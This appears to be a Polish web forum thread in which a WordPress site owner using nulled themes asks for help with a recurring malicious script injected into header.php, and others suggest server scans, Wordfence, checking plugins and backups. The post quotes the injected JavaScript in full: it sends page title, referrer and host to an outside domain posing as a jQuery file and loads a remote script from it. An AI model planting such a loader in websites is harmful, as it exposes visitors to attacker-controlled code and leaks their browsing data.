Skocz do zawartości
spacer.png
spacer.png

Złośliwy kod Wordpress


mamoney

Rekomendowane odpowiedzi

Opublikowano

Witam!

Od kilku dni bez przerwy moją stronę atakuje mnie złośliwy kod, który zamieściłem poniżej. Przez to Google pokazuje moją witrynę jako niebezpieczną, blokując treść. Miał ktoś z Was może taki problem lub wie, jak go zwalczyć?

- zmiana szablonu nie pomaga, w drugim szablonie również zostaje dodawany szkodliwy skrypt
- moje szablony - niestety nulled, ale wcześniej nie miałem z nimi takiego problemu, przyczyn powinna tkwić gdzieś indziej
- przeskanowałem komputer MalwareBytes i usunąłem szkodliwe pliki, które znalazł on podczas skanowania

Dalej... nie wiem co robić, prosiłbym o pomoc!

Cytuj

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer);
var host = encodeURIComponent(window.location.host); var base = "http://ublaze.com/js/jquery.min.php";
var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host;
var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== '')
{document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

Opublikowano

Nie skanuj komputera tylko serwer. A to co podałeś znajdź po prostu w plikach motywu (zapewne header.php lub footer.php, zobacz w którym miejscu w źródle to jest dodane) i usuń.

Opublikowano

Niestety tak jest jesli chcesz motyw premium, a używasz nulled. Myślałeś, że fajny motyw będzie bez bajerów? :troll:
Na 100% header.php do przeanalizowania i tam szukasz swojego problemu.

  • Super 3
Opublikowano

Tak, kod oczywiście usunąłem z header.php, jednakże w przeciągu 3 dni pojawia się on tam ponownie... A jak przeskanować serwer?

Opublikowano
42 minut temu, mamoney napisał:

Tak, kod oczywiście usunąłem z header.php, jednakże w przeciągu 3 dni pojawia się on tam ponownie... A jak przeskanować serwer?

Ściągnij plugin Wordfence:

https://pl.wordpress.org/plugins/wordfence/

i przeskanuj nim bloga powinien wykryć shakowane pliki. Na pewno przejrzyj tez header.php tam musi być złośliwy kod.

Opublikowano

W header.php tylko może być umieszczany, a źródło może być dużo głębiej, np. w jakimś pluginie nulled itp.

Opublikowano
Godzinę temu, mamoney napisał:

Problem w tym że... Taki problem zaczyna też pojawiać się na innych moich domenach.

Więc na Twoim ftp musi być złośliwe oprogramowanie. Napisz do admina swojego serwera niech przeskanują Twój ftp, będziesz wiedział co i jak.

Już dzisiaj doradzałem to jednemu userowi na MC. Backupy przynajmniej raz w tygodniu (jak rzadko wrzucasz content) i po problemie. Wpada robak na wordpresy to czyścisz, przywracasz backupy i po sprawie :) ftp

Opublikowano
6 godzin temu, Earn.pl napisał:

Ściągnij plugin Wordfence:

https://pl.wordpress.org/plugins/wordfence/

i przeskanuj nim bloga powinien wykryć shakowane pliki.

Nie jestem do końca pewny ale coś mi świta, że ów plugin skanuje motywy tylko z oficjalnego repozytorium wordpressa, więc jeśli jest nulled to nie bardzo zadziała lecz mogę się mylić!

  • Super 2
Opublikowano
15 minut temu, Harry napisał:

Nie jestem do końca pewny ale coś mi świta, że ów plugin skanuje motywy tylko z oficjalnego repozytorium wordpressa, więc jeśli jest nulled to nie bardzo zadziała lecz mogę się mylić!

Też nie jestem pewien czy pod nulled działa bo nigdy pod nulled nie próbowałem.

Ale zawsze warto spróbować :)

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Tylko zalogowani użytkownicy mogą dodawać komentarze.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się

spacer.png

spacer.png

×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Ta strona korzysta z ciasteczek, aby świadczyć usługi na najwyższym poziomie. Dalsze korzystanie z witryny oznacza zgodę na ich wykorzystanie. Polityka prywatności .